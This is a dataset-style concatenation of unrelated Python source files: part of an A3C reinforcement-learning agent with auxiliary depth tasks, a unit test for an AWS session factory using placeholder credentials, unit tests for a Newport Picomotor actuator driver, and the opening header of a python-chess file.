            # as a time sequence.
            rnn_in = tf.expand_dims(concatenated, [0])
            # LSTM layer
            lstm_cell = rnn.BasicLSTMCell(256, state_is_tuple=True)
            c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)
            h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)
            self.state_init = [c_init, h_init]
            c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])
            h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])
            step_size = tf.shape(self.inputs)[:1]
            self.state_in = rnn.LSTMStateTuple(c_in, h_in)
            lstm_outputs, lstm_state = \
                tf.nn.dynamic_rnn(lstm_cell,
                                  rnn_in,
                                  sequence_length=step_size,
                                  initial_state=self.state_in,
                                  time_major=False)
            lstm_c, lstm_h = lstm_state
            self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
            rnn_out = tf.reshape(lstm_outputs, [-1, 256])
            # output layers
            self.policy = slim.fully_connected(rnn_out, config.ACTIONS,
                                               activation_fn=tf.nn.softmax,
                                               weights_initializer=normalized_columns_initializer(0.01),
                                               biases_initializer=None, scope='policy_out')
            self.value = slim.fully_connected(rnn_out, 1,
                                              activation_fn=None,
                                              weights_initializer=normalized_columns_initializer(1.0),
                                              biases_initializer=None, scope='value_out')
            # auxiliary outputs: one 8-way classifier per depth pixel
            if config.AUX_TASK_D2:
                self.aux_depth2_hidden = slim.fully_connected(rnn_out, 128, activation_fn=tf.nn.elu)
                self.aux_depth2_logits = [
                    slim.fully_connected(self.aux_depth2_hidden, 8, activation_fn=None)  # , scope='d2_logits'
                    for i in range(4*16)]
            # loss functions (workers only; the global network just holds weights)
            if scope != 'global':
                self.actions = tf.placeholder(shape=[None], dtype=tf.int32)
                self.actions_onehot = tf.one_hot(self.actions, config.ACTIONS, dtype=tf.float32)
                self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)
                self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)
                # Probability assigned to the action actually taken.
                self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
                self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))
                # Clipping avoids log(0) on saturated policies.
                self.entropy = -tf.reduce_sum(self.policy * tf.log(tf.clip_by_value(self.policy, 1e-20, 1)))
                self.policy_loss = -tf.reduce_sum(tf.log(tf.clip_by_value(self.responsible_outputs, 1e-20, 1))
                                                  * self.advantages)
                loss_array = [0.5 * self.value_loss, self.entropy_parameter * self.entropy, self.policy_loss]  # -0.01
                # Auxiliary Loss Functions
                if config.AUX_TASK_D2:
                    self.aux_depth2_losses = [tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
                        labels=self.aux_depth_labels[i], logits=self.aux_depth2_logits[i])) for i in range(4 * 16)]
                    self.aux_depth2_loss = tf.add_n(self.aux_depth2_losses)
                    loss_array.append(1.0 * self.aux_depth2_loss)
                self.loss = tf.add_n(loss_array)
                # Gradients are computed on local variables but applied to
                # the shared 'global' variables (A3C update scheme).
                local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope)
                self.gradients = tf.gradients(self.loss, local_vars)
                self.var_norms = tf.global_norm(local_vars)
                grads, self.grad_norms = tf.clip_by_global_norm(self.gradients, 40.0)
                global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')
                if trainer is not None:
                    self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))
class Worker:
    """ A3C agent, optionally augmented with aux tasks.

    One Worker runs in its own thread: it owns a local copy of the
    actor-critic network (``self.local_AC``), an environment client
    (``Commander``), and periodically syncs from / pushes gradients to the
    shared 'global' network (standard A3C).
    """
    def __init__(self, name, trainer, global_episodes, global_steps, logger_steps, config, start_step):
        """Set up local network, environment and TF bookkeeping ops.

        name: integer worker index (becomes 'worker_<n>').
        trainer: TF optimizer used by the local network to update 'global'.
        global_episodes / global_steps: shared TF counter variables.
        logger_steps: external step counter with an .increment() method.
        """
        self.name = 'worker_' + str(name)
        self.number = name
        self.config = config
        self.model_path = self.config.MODEL_PATH
        self.trainer = trainer
        self.global_episodes = global_episodes
        # assign_add ops are built once here and run via sess.run later.
        self.increment_episodes = global_episodes.assign_add(1)
        self.global_steps = global_steps
        self.local_steps = 0
        self.increment_steps = global_steps.assign_add(1)
        self.cumulative_steps = logger_steps
        self.episode_rewards = []
        self.episode_lengths = []
        self.episode_mean_values = []
        self.summary_writer = tf.summary.FileWriter('train' + str(self.number), graph=tf.get_default_graph())
        self.env = Commander(self.number, self.config, self.name) # RL training (the 'game')
        self.local_AC = ACNetwork(self.name, trainer, self.config, start_step)
        # op that copies the 'global' network weights into this worker's net
        self.update_local_ops = update_target_graph('global', self.name)
        self.actions = self.env.action_space
        self.batch_rnn_state_init = None
        self.last_model_save_steps = 0
        self.last_log_writing_steps = 0
    def train(self, rollout, bootstrap_value, gamma, lmbda, sess):
        """ Actor-Critic + Aux task training.

        rollout: list of per-step experience lists
            [s, a, r, s1, d, v, (aux_depth), (goal_vector), (velocity_state)]
            where the optional tails depend on config flags.
        bootstrap_value: value estimate of the last state (0 if terminal).
        Returns per-step-normalized (v_loss, p_loss, entropy, grad_norm,
        var_norm, depth_loss).
        """
        # load an episode of experiences
        rollout = np.array(rollout)
        observations = rollout[:, 0]
        actions = rollout[:, 1]
        rewards = rollout[:, 2]
        next_observations = rollout[:, 3]
        values = rollout[:, 5]
        if self.config.AUX_TASK_D2:
            aux_depth = rollout[:, 6]
        if self.config.GOAL_ON:
            goal_vector = np.vstack(gv for gv in rollout[:, -2]) # TODO: this implementation does not allow using goal vector without acceleration actions...
        if self.config.ACCELERATION_ACTIONS:
            velocity_state = np.vstack(vs for vs in rollout[:, -1])
        # 8x8 one-hot lookup used to encode quantized depth labels below
        identity = np.eye(8)
        # calculating discounted return for each step
        rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
        discounted_rewards = discount(rewards_plus, gamma)[:-1]
        value_plus = np.asarray(values.tolist() + [bootstrap_value])
        advantages = rewards + gamma * value_plus[1:] - value_plus[:-1] # Advantage, approximated by TD error
        # GAE-style smoothing of the TD errors with factor lambda
        advantages = discount(advantages, lmbda)
        rnn_state = self.local_AC.state_init
        feed_dict = {self.local_AC.target_v: discounted_rewards,
                     self.local_AC.inputs: np.vstack(np.expand_dims(obs, 0) for obs in observations),
                     self.local_AC.actions: actions,
                     self.local_AC.advantages: advantages,
                     self.local_AC.state_in[0]: rnn_state[0],
                     self.local_AC.state_in[1]: rnn_state[1]
                     }
        ops_for_run = [self.local_AC.value_loss,
                       self.local_AC.policy_loss,
                       self.local_AC.entropy,
                       self.local_AC.grad_norms,
                       self.local_AC.var_norms,
                       self.local_AC.apply_grads]
        # if training with auxiliary tasks, augment feed_dict and loss ops
        if self.config.AUX_TASK_D2:
            # one-hot encode each of the 4x16 depth cells over 8 bins
            depth_list = [np.vstack(identity[batch, :] for batch in px) for px in np.transpose(aux_depth)]
            depth_labels = np.swapaxes(np.array(depth_list), 0, 1)
            feed_dict.update({self.local_AC.aux_depth_labels[px]: depth_labels[px] for px in range(4*16)})
            ops_for_run.insert(3, self.local_AC.aux_depth2_loss)
        if self.config.GOAL_ON:
            feed_dict.update({self.local_AC.direction_input: goal_vector})
        if self.config.ACCELERATION_ACTIONS:
            feed_dict.update({self.local_AC.velocity_state: velocity_state})
        if self.config.PREV_ACTION_ON:
            # shift actions by one step: row i holds the one-hot of action i-1
            prev_action = np.zeros((1, self.config.ACTIONS), dtype=np.float32)
            for i in range(len(actions)-1):
                prev_action = np.vstack((prev_action, np.eye(self.config.ACTIONS, dtype=np.float32)[actions[i]][:]))
            feed_dict.update({self.local_AC.prev_action: prev_action})
        if self.config.PREV_REWARD_ON:
            # same one-step shift for rewards
            prev_reward = np.zeros((1, 1), dtype=float)
            for i in range(len(rewards) - 1):
                prev_reward = np.vstack((prev_reward, rewards[i]))
            feed_dict.update({self.local_AC.prev_reward: prev_reward})
        # calculate losses and gradients
        results = sess.run(ops_for_run, feed_dict=feed_dict)
        v_l, p_l, e_l = results[:3]
        # NOTE(review): results[3] is the aux depth loss only when
        # AUX_TASK_D2 inserted it above; otherwise it aliases grad_norms —
        # confirm callers only use depth_l with AUX_TASK_D2 enabled.
        depth_losses = results[3]
        g_n, v_n = results[-3:-1]
        # NOTE(review): results[-1] is the output of apply_grads, not an RNN
        # state — verify this assignment is intended.
        self.batch_rnn_state_init = results[-1]
        return v_l / len(rollout), p_l / len(rollout), e_l / len(rollout), g_n, v_n, depth_losses/len(rollout)
    def work(self, sess, coord, saver):
        """ Target function for Thread.run(), policy evaluation on episodes + training """
        episode_count = sess.run(self.global_episodes)
        print('Starting worker ' + str(self.number))
        with sess.as_default(), sess.graph.as_default():
            # Training Loop
            while not coord.should_stop():
                # initializing episode: sync local net from 'global', reset buffers
                sess.run(self.update_local_ops)
                episode_buffer = []
                episode_values = []
                episode_frames = []
                episode_reward = 0
                episode_step_count = 0
                d = False
                previous_reward = np.expand_dims(np.expand_dims(0.0, 0), 0) # np.zeros([1, 1], dtype=float)
                previous_action = np.zeros([1, self.config.ACTIONS], dtype=np.float32)
                self.env.new_episode()
                s = self.env.get_observation()
                episode_frames.append(s)
                if self.config.AUX_TASK_D2:
                    aux_depth = np.expand_dims(self.env.get_observation(viewmode='depth').flatten(), 0)
                if self.config.GOAL_ON:
                    goal_direction = self.env.get_goal_direction()
                if self.config.ACCELERATION_ACTIONS:
                    velocity_state = self.env.get_velocity_state()
                rnn_state = self.local_AC.state_init
                self.batch_rnn_state_init = rnn_state
                # Episode Loop
                while self.env.is_episode_finished() is False:
                    # running network for action selection
                    feed_dict = {self.local_AC.inputs: [s],
                                 self.local_AC.state_in[0]: rnn_state[0],
                                 self.local_AC.state_in[1]: rnn_state[1]}
                    if self.config.GOAL_ON:
                        feed_dict.update({self.local_AC.direction_input: goal_direction})
                    if self.config.ACCELERATION_ACTIONS:
                        feed_dict.update({self.local_AC.velocity_state: velocity_state})
                    if self.config.PREV_ACTION_ON:
                        feed_dict.update({self.local_AC.prev_action: previous_action})
                    if self.config.PREV_REWARD_ON:
                        feed_dict.update({self.local_AC.prev_reward: previous_reward})
                    a_dist, v, rnn_state = sess.run([self.local_AC.policy,
                                                     self.local_AC.value,
                                                     self.local_AC.state_out],
                                                    feed_dict=feed_dict)
                    # sample an action index from the policy distribution:
                    # draw a probability value, then recover its index.
                    # NOTE(review): the argmax-of-equality trick picks the
                    # first match if two actions share a probability — confirm
                    # ties are acceptable here.
                    a = np.random.choice(a_dist[0], p=a_dist[0])
                    a = np.argmax(np.equal(a_dist, a))
                    previous_action = np.expand_dims(np.eye(self.config.ACTIONS)[a][:], 0) # onehot previous action
                    self.cumulative_steps.increment()
                    sess.run(self.increment_steps)
                    self.local_steps += 1
                    # Act and receive reward from th environment
                    r = self.env.action(self.actions[a])
                    d = self.env.is_episode_finished()
                    previous_reward = np.expand_dims(np.expand_dims(r, 0), 0)
                    if d is False:
                        s1 = self.env.get_observation()
                        episode_frames.append(s1)
                    else:
                        s1 = s
                    # base experience tuple; optional fields are appended below
                    episode_experiences = [s, a, r, s1, d, v[0, 0]]
                    if self.config.AUX_TASK_D2:
                        aux_depth = np.expand_dims(self.env.get_observation(viewmode='depth').flatten(), 0)
                        episode_experiences.append(aux_depth)
                    if self.config.GOAL_ON:
                        goal_direction = self.env.get_goal_direction()
                        episode_experiences.append(goal_direction)
                    if self.config.ACCELERATION_ACTIONS:
                        velocity_state = self.env.get_velocity_state()
                        episode_experiences.append(velocity_state)
                    episode_buffer.append(episode_experiences)
                    episode_values.append(v[0, 0])
                    episode_reward += r
                    s = s1
                    episode_step_count += 1
                    # running training step at the end of episode
                    if (len(episode_buffer) == self.config.STEPS_FOR_UPDATE) or d or\
                            (episode_step_count == self.config.MAX_EPISODE_LENGTH):
                        if d:
                            v1 = 0.0 # episode finished, no bootstrapping needed
                        else:
                            # bootstrap value from the last step for return calculation
                            feed_dict_v = {self.local_AC.inputs: [s],
                                           self.local_AC.state_in[0]: rnn_state[0],
                                           self.local_AC.state_in[1]: rnn_state[1]}
                            if self.config.GOAL_ON:
                                feed_dict_v.update({self.local_AC.direction_input: goal_direction})
                            if self.config.ACCELERATION_ACTIONS:
                                feed_dict_v.update({self.local_AC.velocity_state: velocity_state})
                            if self.config.PREV_ACTION_ON:
                                feed_dict_v.update({self.local_AC.prev_action: previous_action})
                            if self.config.PREV_REWARD_ON:
                                feed_dict_v.update({self.local_AC.prev_reward: previous_reward})
                            # NOTE(review): v1 is a (1, 1) array here, not a
                            # scalar — train() tolerates it via tolist()
                            # concatenation, but confirm discount() does too.
                            v1 = sess.run(self.local_AC.value,
                                          feed_dict=feed_dict_v)
                        v_l, p_l, e_l, g_n, v_n, depth_l = self.train(episode_buffer, v1, self.config.GAMMA, self.config.LAMBDA, sess)
                        episode_buffer = []
                        sess.run(self.update_local_ops)
                    if d or (episode_step_count == self.config.MAX_EPISODE_LENGTH):
                        break
                # Summary writing, model saving, etc.
                self.episode_rewards.append(episode_reward)
                self.episode_lengths.append(episode_step_count)
                self.episode_mean_values.append(np.mean(episode_values))
                steps_since_log = self.local_steps - self.last_log_writing_steps
                if steps_since_log > self.config.LOGGING_PERIOD:
                    # averages over the last 5 episodes for TensorBoard
                    mean_reward = np.mean(self.episode_rewards[-5:])
                    mean_length = np.mean(self.episode_lengths[-5:])
                    mean_value = np.mean(self.episode_mean_values[-5:])
                    summary = tf.Summary()
                    summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))
                    summary.value.add(tag='Perf/Length', simple_value=float(mean_length))
                    summary.value.add(tag='Perf/Value', simple_value=float(mean_value))
                    summary.value.add(tag='Losses/Value Loss', simple_value=float(v_l))
                    summary.value.add(tag='Losses/Policy Loss', simple_value=float(p_l))
                    summary.value.add(tag='Losses/Entropy', simple_value=float(e_l))
                    summary.value.add(tag='Losses/Grad Norm', simple_value=float(g_n))
                    summary.value.add(tag='Var Norm', simple_value=float(v_n))
                    summary.value.add(tag='Losses/Depth Loss', simple_value=float(depth_l))
                    self.summary_writer.add_summary(summary, episode_count)
                    self.summary_writer.flush()
                    self.last_log_writing_steps = self.local_steps
                current_global_steps = sess.run(self.global_steps)
                # only worker_0 saves checkpoints and counts global episodes
                if self.name == 'worker_0':
                    steps_since_save = current_global_steps - self.last_model_save_steps
                    if steps_since_save > self.config.MODEL_SAVE_PERIOD:
                        print('--- Saving model at {} global steps'.format(current_global_steps))
                        # round the bookmark down to a multiple of the save period
                        self.last_model_save_steps = current_global_steps -\
                            (current_global_steps % self.config.MODEL_SAVE_PERIOD)
                        saver.save(sess, self.model_path + '/model-' + str(int(self.last_model_save_steps/1000)) + 'k.cptk')
                    sess.run(self.increment_episodes)
                    print('--- worker_0 {} episodes, {} global steps'.format(episode_count, current_global_steps))
                if current_global_steps > self.config.MAX_STEPS:
                    coord.request_stop()
                episode_count += 1
            # shutting down client and sim
            print('Shutting down {}... '.format(self.name))
            self.env.shut_down()
            print(' Sim and client closed.')
class Player:
    """ A3C Agent for evaluation.

    Loads the weights of the shared 'global' network into a private copy and
    runs greedy (or stochastic) rollouts without any training; records
    crashes and timeouts, and lets the environment save trajectories.
    """
    def __init__(self, number, config):
        """Build the evaluation network and environment client for player <number>."""
        self.name = 'player_' + str(number)
        print('Initializing {} ...'.format(self.name))
        self.config = config
        self.number = number
        # trainer=None: this network is inference-only (no loss/apply ops)
        self.local_AC = ACNetwork('player_{}'.format(self.number), None, self.config, 0)
        self.update_local_ops = update_target_graph('global', 'player_{}'.format(self.number))
        self.env = Commander(self.number, self.config, self.name)
        self.actions = self.env.action_space
        self.episodes_started = 0
        self.episodes_finished = 0
        self.steps = 0
        self.rnn_state = None
        self.s = None
        self.stop_requested = False
        # episode-end counters: crashes (env terminal) vs timeouts
        self.crashes = 0
        self.terminations = 0
        # remove previous trajectory logs to avoid unintentional appending
        ucv_utils.remove_file('./trajectory_{}.yaml'.format(self.name))
        print('[{}] initialization done.'.format(self.name))
    def play(self, session, coordinator):
        """Run evaluation episodes until the coordinator requests a stop."""
        with session.as_default(), session.graph.as_default():
            session.run(self.update_local_ops) # loading weights
            # evaluation loop
            while not coordinator.should_stop():
                finished_episode = False
                self.s = self.env.get_observation()
                self.rnn_state = self.local_AC.state_init
                self.steps = 0
                self.episodes_started += 1
                previous_reward = np.expand_dims(np.expand_dims(0.0, 0), 0) # np.zeros([1, 1], dtype=float)
                previous_action = np.zeros([1, self.config.ACTIONS], dtype=np.float32)
                if self.config.ACCELERATION_ACTIONS:
                    # NOTE(review): velocity_state is fetched once per episode
                    # here, while Worker refreshes it every step — confirm.
                    velocity_state = self.env.get_velocity_state()
                # episode loop
                while not finished_episode:
                    # NOTE(review): the RNN state fed here is always
                    # state_init, not self.rnn_state from the previous step —
                    # the recurrent state is never carried forward; verify
                    # this is intended.
                    feed_dict = {self.local_AC.inputs: [self.env.get_observation()],
                                 self.local_AC.state_in[0]: self.local_AC.state_init[0],
                                 self.local_AC.state_in[1]: self.local_AC.state_init[1]}
                    if self.config.GOAL_ON:
                        goal_direction = self.env.get_goal_direction()
                        feed_dict.update({self.local_AC.direction_input: goal_direction})
                    if self.config.PREV_ACTION_ON:
                        feed_dict.update({self.local_AC.prev_action: previous_action})
                    if self.config.PREV_REWARD_ON:
                        feed_dict.update({self.local_AC.prev_reward: previous_reward})
                    if self.config.ACCELERATION_ACTIONS:
                        feed_dict.update({self.local_AC.velocity_state: velocity_state})
                    if self.config.AUX_TASK_D2:
                        # no training, no need for depth images
                        # self.env.get_observation(viewmode='depth')
                        pass
                    # running inference on network, action selection
                    a_dist, self.rnn_state = session.run([self.local_AC.policy, self.local_AC.state_out], feed_dict=feed_dict)
                    if self.config.STOCHASTIC_POLICY_EVAL:
                        # sample from policy, then recover the sampled index
                        a = np.random.choice(a_dist[0], p=a_dist[0])
                        a = np.argmax(np.equal(a_dist, a))
                    else:
                        # greedy action
                        a = np.argmax(a_dist)
                    reward = self.env.action(self.actions[a])
                    self.steps += 1
                    previous_action = np.expand_dims(np.eye(self.config.ACTIONS)[a][:], 0) # onehot previous action
                    previous_reward = np.expand_dims(np.expand_dims(reward, 0), 0)
                    if self.steps > self.config.MAX_EVALUATION_EPISODE_LENGTH:
                        # timed out: restart and count as termination
                        self.env.new_episode(save_trajectory=True)
                        self.terminations += 1
                        finished_episode = True
                    if self.env.is_episode_finished():
                        # environment signalled terminal state (e.g. crash)
                        self.env.new_episode(save_trajectory=True)
                        self.crashes += 1
                        finished_episode = True
                self.episodes_finished += 1
            self.env.shut_down()
|
mkisantal/ucv-control
|
network.py
|
Python
|
mit
| 26,027
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import boto3
import pretend
import pytest
from warehouse import aws
@pytest.mark.parametrize("region", [None, "us-west-2"])
def test_aws_session_factory(monkeypatch, region):
    """The factory builds a boto3 Session from the registry settings,
    forwarding the region only when one is configured."""
    # Stub out boto3.session.Session and record every construction call.
    session_stub = pretend.stub()
    recorded_session_cls = pretend.call_recorder(lambda **kw: session_stub)
    monkeypatch.setattr(boto3.session, "Session", recorded_session_cls)
    settings = {"aws.key_id": "my key", "aws.secret_key": "my secret"}
    request = pretend.stub(registry=pretend.stub(settings=settings))
    if region is not None:
        settings["aws.region"] = region
    # The factory must return exactly the session boto3 produced...
    assert aws.aws_session_factory(None, request) is session_stub
    # ...and must have passed the credentials (plus region when set).
    expected_kwargs = dict(
        aws_access_key_id="my key",
        aws_secret_access_key="my secret",
    )
    if region is not None:
        expected_kwargs["region_name"] = region
    assert recorded_session_cls.calls == [pretend.call(**expected_kwargs)]
def test_includeme():
    """includeme registers the AWS session factory under 'aws.session'."""
    recorder = pretend.call_recorder(lambda factory, name: None)
    config = pretend.stub(register_service_factory=recorder)
    aws.includeme(config)
    expected = [pretend.call(aws.aws_session_factory, name="aws.session")]
    assert recorder.calls == expected
|
pypa/warehouse
|
tests/unit/test_aws.py
|
Python
|
apache-2.0
| 1,734
|
# -*- coding: utf-8 -*-
'''
Created on 27 Jan 2015 (based on tmcm_test.py)
@author: Éric Piel
Copyright © 2014-2015 Éric Piel, Delmic
This file is part of Odemis.
Odemis is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with Odemis. If not, see http://www.gnu.org/licenses/.
'''
from __future__ import division
from concurrent import futures
import logging
import math
from odemis.driver import nfpm
import os
import time
import unittest
from unittest.case import skip
logging.getLogger().setLevel(logging.DEBUG)
# Export TEST_NOHW=1 to force using only the simulator and skipping test cases
# needing real hardware
# BUG FIX: os.environ values are always strings, so the previous comparison
# (os.environ.get("TEST_NOHW", 0) != 0) was True for ANY set value, including
# TEST_NOHW=0. Comparing against the string "0" keeps hardware testing
# enabled for TEST_NOHW=0 while the unset default is unchanged.
TEST_NOHW = (os.environ.get("TEST_NOHW", "0") != "0") # Default to Hw testing
CLASS = nfpm.PM8742
# Connection / axis configuration for the real hardware...
KWARGS = dict(name="test", role="fiber-align", address="autoip",
              axes=["x", "y"],
              stepsize=[33.e-9, 33.e-9],
              inverted=["x"])
# ...and the same configuration pointed at the simulator.
KWARGS_SIM = dict(KWARGS)
KWARGS_SIM["address"] = "fake"
if TEST_NOHW:
    KWARGS = KWARGS_SIM
# @skip("faster")
class TestStatic(unittest.TestCase):
    """
    Tests which don't need a component ready
    """
    def test_scan(self):
        """
        Check that we can do a scan network. It can pass only if we are
        connected to at least one controller.
        """
        devices = CLASS.scan()
        if not TEST_NOHW:
            # with real hardware at least one controller must answer
            self.assertGreater(len(devices), 0)
        for name, kwargs in devices:
            # Python 2 print statement (this module targets Python 2)
            print "opening", name
            stage = CLASS(name, "stage", **kwargs)
            self.assertTrue(stage.selfTest(), "Controller self test failed.")
    def test_fake(self):
        """
        Just makes sure we don't (completely) break the simulator after an update
        """
        dev = CLASS(**KWARGS_SIM)
        self.assertGreater(len(dev.axes), 0)
        for axis in dev.axes:
            # tiny relative-looking absolute move on each axis
            dev.moveAbs({axis:-0.1e-6})
        self.assertTrue(dev.selfTest(), "self test failed.")
        dev.terminate()
# @skip("faster")
class TestActuator(unittest.TestCase):
    """Tests requiring a (real or simulated) PM8742 actuator component.

    Each test gets a fresh device via setUp/tearDown; moves are expressed in
    metres and executed asynchronously, returning futures.
    """
    def setUp(self):
        # instantiate the driver (real hardware or simulator per TEST_NOHW)
        self.dev = CLASS(**KWARGS)
        self.orig_pos = dict(self.dev.position.value)
    def tearDown(self):
        time.sleep(1)
        # move back to the original position
        f = self.dev.moveAbs(self.orig_pos)
        f.result()
        self.dev.terminate()
    # @skip("faster")
    def test_simple(self):
        """A small relative move ends up at the expected position."""
        move = {'x': 0.1e-6}
        self.dev.moveRel(move)
        time.sleep(0.1) # wait for the move to finish
        self.assertAlmostEqual(move["x"], self.dev.position.value["x"])
    def test_sync(self):
        """Waiting on the future (sync) takes longer than just issuing the move."""
        # For moves big enough, sync should always take more time than async
        delta = 0.0001 # s
        move = {'x':100e-6}
        start = time.time()
        f = self.dev.moveRel(move)
        dur_async = time.time() - start
        f.result()
        self.assertTrue(f.done())
        move = {'x':-100e-6}
        start = time.time()
        f = self.dev.moveRel(move)
        f.result() # wait
        dur_sync = time.time() - start
        self.assertTrue(f.done())
        self.assertGreater(dur_sync, max(0, dur_async - delta), "Sync should take more time than async.")
        move = {'x':0.1e-3}
        f = self.dev.moveRel(move)
        # timeout = 0.001s should be too short for such a long move
        self.assertRaises(futures.TimeoutError, f.result, timeout=0.001)
        f.cancel()
    def test_linear_pos(self):
        """
        Check that the position reported during a move is always increasing
        (or decreasing, depending on the direction)
        """
        move = {'x': 1e-3}
        self.prev_pos = self.dev.position.value
        self.direction = 1
        self.dev.position.subscribe(self.pos_listener)
        f = self.dev.moveRel(move)
        f.result() # wait
        time.sleep(0.1) # make sure the listener has also received the info
        # same, in the opposite direction
        move = {'x':-1e-3}
        self.direction = -1
        f = self.dev.moveRel(move)
        f.result() # wait
        self.dev.position.unsubscribe(self.pos_listener)
    def pos_listener(self, pos):
        # callback for position updates: assert monotonicity along x
        diff_pos = pos["x"] - self.prev_pos["x"]
        if diff_pos == 0:
            return # no update/change on X
        self.prev_pos = pos
        # TODO: on closed-loop axis it's actually possible to go very slightly
        # back (at the end, in case of overshoot)
        self.assertGreater(diff_pos * self.direction, -20e-6) # negative means opposite dir
    def test_stop(self):
        """stop() cancels the running and queued moves."""
        self.dev.stop()
        move = {'y':100e-6}
        f = self.dev.moveRel(move)
        self.assertTrue(f.cancel())
        self.assertTrue(f.cancelled())
        # Try similar but with stop (should cancel every futures)
        move = {'y':-100e-6}
        f = self.dev.moveRel(move)
        self.dev.stop()
        time.sleep(0.01)
        self.assertTrue(f.cancelled())
    def test_queue(self):
        """Queued moves execute sequentially, so total time >= sum of move times."""
        # long moves
        move_forth = {'x': 0.1e-3}
        move_back = {'x':-0.1e-3}
        start = time.time()
        expected_time = 4 * move_forth["x"] / self.dev.speed.value["x"]
        f0 = self.dev.moveRel(move_forth)
        f1 = self.dev.moveRel(move_back)
        f2 = self.dev.moveRel(move_forth)
        f3 = self.dev.moveRel(move_back)
        # intentionally skip some sync (it _should_ not matter)
        # f0.result()
        f1.result()
        # f2.result()
        f3.result()
        dur = time.time() - start
        self.assertGreaterEqual(dur, expected_time)
    def test_cancel(self):
        """Futures can be cancelled while running, while queued, and repeatedly."""
        # long moves
        move_forth = {'x': 0.1e-3}
        move_back = {'x':-0.1e-3}
        # test cancel during action
        f = self.dev.moveRel(move_forth)
        time.sleep(0.01) # to make sure the action is being handled
        self.assertTrue(f.running())
        f.cancel()
        self.assertTrue(f.cancelled())
        self.assertTrue(f.done())
        # test cancel in queue
        f1 = self.dev.moveRel(move_forth)
        f2 = self.dev.moveRel(move_back)
        f2.cancel()
        self.assertFalse(f1.done())
        self.assertTrue(f2.cancelled())
        self.assertTrue(f2.done())
        # test cancel after already cancelled
        f.cancel()
        self.assertTrue(f.cancelled())
        self.assertTrue(f.done())
        f1.result() # wait for the move to be finished
    def test_not_cancel(self):
        """cancel() after completion must be a no-op (future stays not-cancelled)."""
        small_move_forth = {'x': 10e-6}
        exp_time = small_move_forth["x"] / self.dev.speed.value["x"]
        # test cancel after done => not cancelled
        f = self.dev.moveRel(small_move_forth)
        time.sleep(exp_time * 2 + 0.1)
        self.assertFalse(f.running())
        f.cancel()
        self.assertFalse(f.cancelled())
        self.assertTrue(f.done())
        # test cancel after result()
        f = self.dev.moveRel(small_move_forth)
        f.result()
        f.cancel()
        self.assertFalse(f.cancelled())
        self.assertTrue(f.done())
        # test not cancelled
        f = self.dev.moveRel(small_move_forth)
        f.result()
        self.assertFalse(f.cancelled())
        self.assertTrue(f.done())
    def test_move_circle(self):
        """Trace a circle with many small x/y relative moves."""
        radius = 0.1e-3 # m
        # each step has to be big enough so that each move is above imprecision
        steps = 100
        cur_pos = (0, 0)
        move = {}
        for i in xrange(steps):
            next_pos = (radius * math.cos(2 * math.pi * float(i) / steps),
                        radius * math.sin(2 * math.pi * float(i) / steps))
            move['x'] = next_pos[0] - cur_pos[0]
            move['y'] = next_pos[1] - cur_pos[1]
            # Python 2 print statement (this module targets Python 2)
            print next_pos, move
            f = self.dev.moveRel(move)
            f.result() # wait
            cur_pos = next_pos
    def test_future_callback(self):
        """Done-callbacks fire whether added while running, queued, finished or cancelled."""
        move_forth = {'x': 10e-6}
        move_back = {'x':-10e-6}
        # test callback while being executed
        self.called = 0
        f = self.dev.moveRel(move_forth)
        time.sleep(0.0) # give it some time to be scheduled (but not enough to be finished)
        f.add_done_callback(self.callback_test_notify)
        f.result()
        time.sleep(0.01) # make sure the callback had time to be called
        self.assertEquals(self.called, 1)
        self.assertTrue(f.done())
        # test callback while in the queue
        self.called = 0
        f1 = self.dev.moveRel(move_back)
        f2 = self.dev.moveRel(move_forth)
        f2.add_done_callback(self.callback_test_notify)
        self.assertFalse(f1.done())
        f2.result()
        self.assertTrue(f1.done())
        time.sleep(0.01) # make sure the callback had time to be called
        self.assertEquals(self.called, 1)
        self.assertTrue(f2.done())
        # It should work even if the action is fully done
        f2.add_done_callback(self.callback_test_notify2)
        self.assertEquals(self.called, 2)
        # test callback called after being cancelled
        move_forth = {'x': 1e-3}
        self.called = 0
        f = self.dev.moveRel(move_forth)
        time.sleep(0.0)
        self.assertTrue(f.cancel()) # Returns false if already over
        f.add_done_callback(self.callback_test_notify)
        time.sleep(0.01) # make sure the callback had time to be called
        self.assertEquals(self.called, 1)
        self.assertTrue(f.cancelled())
    def callback_test_notify(self, future):
        # done-callback: count invocations on self.called
        self.assertTrue(future.done())
        self.called += 1
        # Don't display future with %s or %r as it uses lock, which can deadlock
        # with the logging
        logging.debug("received done for future %s", id(future))
    def callback_test_notify2(self, future):
        # second done-callback used to check late registration still fires
        self.assertTrue(future.done())
        self.called += 1
        logging.debug("received (2) done for future %s", id(future))
# Allow running this test module directly (instead of via a test runner).
if __name__ == "__main__":
    unittest.main()
|
gstiebler/odemis
|
src/odemis/driver/test/nfpm_test.py
|
Python
|
gpl-2.0
| 10,237
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of the python-chess library.
